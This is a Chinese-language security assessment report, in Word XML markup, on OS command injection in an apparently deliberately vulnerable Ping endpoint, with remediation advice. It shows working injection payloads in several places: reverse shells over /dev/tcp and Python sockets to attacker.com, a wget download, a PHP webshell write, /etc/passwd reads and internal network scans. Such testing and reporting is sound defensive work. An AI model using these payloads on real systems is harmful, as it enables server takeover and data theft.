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CC0000"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
        <w:br/>
        <w:t>检测报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测目标：用户信息管理平台 — Ping 网络诊断功能</w:t>
        <w:br/>
        <w:t>检测日期：2026-07-15</w:t>
        <w:br/>
        <w:t>检测分支：vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>1. 报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本报告对用户信息管理平台的 Ping 网络诊断功能（/ping）进行了命令执行漏洞专项检测。检测发现共 8 类命令注入相关安全漏洞，严重级别均为高危或以上。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检测目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户信息管理平台 — /ping 端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测分支</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vulnerable（漏洞版）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2026-07-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl / 手动渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping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C0000"/>
        </w:rPr>
        <w:t>2. 漏洞 1：基础命令注入（分号）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OS 命令注入 — 分号分隔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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f"ping -c 3 {ip}" + subprocess.check_output(command, shell=True)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/ping 功能使用 f-string 拼接用户输入到系统命令，并使用 shell=True 执行。攻击者可通过分号 ; 分隔符注入任意系统命令。</w:t>
      </w:r>
    </w:p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$ curl -b cookies.txt --data-urlencode "ip=127.0.0.1; id" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># 返回: uid=0(root) gid=0(root) groups=0(root)</w:t>
        <w:br/>
        <w:t># ✅ 命令执行成功，当前为 root 用户</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC 攻击向量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ip=127.0.0.1; ls -la                                    # 列目录</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; cat /etc/passwd                              # 读文件</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; wget http://attacker.com/shell.py            # 下载恶意文件</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; python3 -c 'import socket...'                 # 反弹 shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>3. 漏洞 2：管道符注入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OS 命令注入 — 管道符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</w:tbl>
    <w:p/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$ curl -b cookies.txt --data-urlencode "ip=127.0.0.1 | whoami" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># 返回: root</w:t>
        <w:br/>
        <w:t># ✅ 管道符 | 注入成功</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>使用 | 管道符可以让 ping 的输出被管道传递给恶意命令执行，而恶意命令的输出会显示在页面上。实际执行的命令为：ping -c 3 127.0.0.1 | whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>4. 漏洞 3：逻辑运算符注入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OS 命令注入 — 逻辑运算符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</w:tbl>
    <w:p/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$ curl -b cookies.txt --data-urlencode "ip=127.0.0.1 &amp;&amp; ls -la /home" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 返回 /home 目录列表</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -b cookies.txt --data-urlencode "ip=127.0.0.1 || id" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 逻辑或也可执行</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&amp;&amp; 前一个命令成功则执行后一个；|| 前一个命令失败则执行后一个。即使 ping 执行失败，攻击者的命令仍可执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>5. 漏洞 4：文件读取与泄露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OS 命令注入 — 文件读取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</w:tbl>
    <w:p/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读取系统密码文件</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; cat /etc/passwd</w:t>
        <w:br/>
        <w:t># ✅ 返回: root:x:0:0:root:/root:/bin/bash ...</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取应用配置</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; cat /home/user/user-management/app.py</w:t>
        <w:br/>
        <w:t># ✅ 返回源代码，含密钥和密码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泄露信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/etc/passwd — 所有系统账号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>应用源代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>app.py — secret_key、数据库结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户密码明文</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>USERS 字典中的 admin123、alice2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GitHub 仓库地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>.git/config 中的远程仓库 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>网络配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ifconfig — 内网 IP、网络拓扑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C0000"/>
        </w:rPr>
        <w:t>6. 漏洞 5：文件写入（后门植入）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OS 命令注入 — 文件写入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</w:tbl>
    <w:p/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$ curl -b cookies.txt --data-urlencode \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ip=127.0.0.1; echo 'INJECTED' &gt; /tmp/pwned.txt" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt --data-urlencode \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ip=127.0.0.1; cat /tmp/pwned.txt" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 返回: INJECTED</w:t>
        <w:br/>
        <w:br/>
        <w:t># 写入 webshell</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; /var/www/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过 echo 或重定向符 &gt; 可向服务器写入任意文件。攻击者可植入 webshell、后门程序、恶意脚本等持久化控制手段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>7. 漏洞 6：反弹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OS 命令注入 — 反弹 Shell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中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>服务器已安装 nc、bash、python3 等可用于反弹 Shell 的工具。攻击者可结合命令注入获取交互式 Shell 访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>可用工具检测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$ curl -b cookies.txt --data-urlencode \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ip=127.0.0.1; which nc ncat bash python3 python perl" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target.com/ping</w:t>
        <w:br/>
        <w:t># 返回: /usr/bin/nc\n/usr/bin/bash\n/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>反弹 Shell PoC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攻击者监听</w:t>
        <w:br/>
        <w:t>attacker$ nc -lvnp 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t># 目标执行（通过命令注入）</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1</w:t>
        <w:br/>
        <w:br/>
        <w:t># 或使用 Python</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; python3 -c 'import socket,subprocess;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  s=socket.socket();s.connect(("attacker.com",4444));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stdout=s.fileno(),stderr=s.fileno())'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>8. 漏洞 7：内网扫描与横向移动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OS 命令注入 — 内网扫描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</w:tbl>
    <w:p/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获取本机网络配置</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; ip addr</w:t>
        <w:br/>
        <w:t># ✅ 返回 eth0、lo 等网络接口信息</w:t>
        <w:br/>
        <w:br/>
        <w:t># 内网 Ping 扫描</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; for i in $(seq 1 254); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ping -c 1 192.168.1.$i &amp;&gt;/dev/null &amp;&amp; echo "HOST:192.168.1.$i"; done</w:t>
        <w:br/>
        <w:br/>
        <w:t># 端口扫描</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; nc -zv 10.0.0.1 22 80 443 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击者可通过命令注入获取内网拓扑信息，进而扫描内网其他主机和服务，实施横向移动攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>9. 漏洞 8：反向引号与子 Shell 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OS 命令注入 — 反向引号/子 Shell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</w:tbl>
    <w:p/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反向引号注入</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1`id`</w:t>
        <w:br/>
        <w:t># ✅ 命令在子 Shell 中执行</w:t>
        <w:br/>
        <w:br/>
        <w:t># $() 子 Shell 注入</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1$(whoami)</w:t>
        <w:br/>
        <w:t># ✅ 子 Shell 语法同样生效</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>反向引号 `command` 和 $(command) 都会创建子 Shell 执行命令，结果嵌入到 ping 命令参数字符串中。即使开发者对空格和特殊字符做过滤，这两种注入方式仍可能绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>10. 漏洞矩阵与修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>漏洞矩阵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1417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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>利用难度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分号命令注入 (;)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任意命令执行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管道符注入 (|)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任意命令输出窃取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逻辑运算符注入 (&amp;&amp;/||)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条件命令执行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文件读取泄露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系统/应用文件泄露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文件写入后门植入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持久化后门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反弹 Shell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中</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>完全服务器控制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内网扫描与横向移动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内网渗透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反向引号与子 Shell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绕过过滤执行命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>🔴 紧急修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. 禁用 shell=True，移除 f-string 拼接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❌ 危险代码</w:t>
        <w:br/>
        <w:t>command = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t>subprocess.check_output(command, shell=True)</w:t>
        <w:br/>
        <w:br/>
        <w:t># ✅ 安全修复</w:t>
        <w:br/>
        <w:t>import shlex</w:t>
        <w:br/>
        <w:t>command = ["ping", "-c", "3", ip]</w:t>
        <w:br/>
        <w:t>subprocess.check_output(command, shell=False)  # 无 shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. 参数白名单校验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import ipaddress</w:t>
        <w:br/>
        <w:br/>
        <w:t>try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ipaddress.ip_address(ip)  # 校验是否为合法 IP</w:t>
        <w:br/>
        <w:t>except ValueError:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("ping.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        result="请输入合法的 IP 地址")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. 输入长度和字符限制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仅允许 IP 地址相关字符</w:t>
        <w:br/>
        <w:t>import re</w:t>
        <w:br/>
        <w:t>if not re.match(r"^[\d.]+$", ip):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("ping.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        result="IP 地址格式错误")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>🟡 建议修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 使用 shlex.quote() 转义用户输入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 设置命令执行超时（已设置 30s）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 限制可执行的命令白名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>7. 将 ping 功能封装在 Docker 容器中隔离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>8. 添加操作审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>9. 降权运行（不要使用 root 权限执行命令）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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18"/>
        </w:rPr>
        <w:t>免责声明：本报告仅用于安全教育和漏洞验证。请在获得授权的前提下进行安全测试。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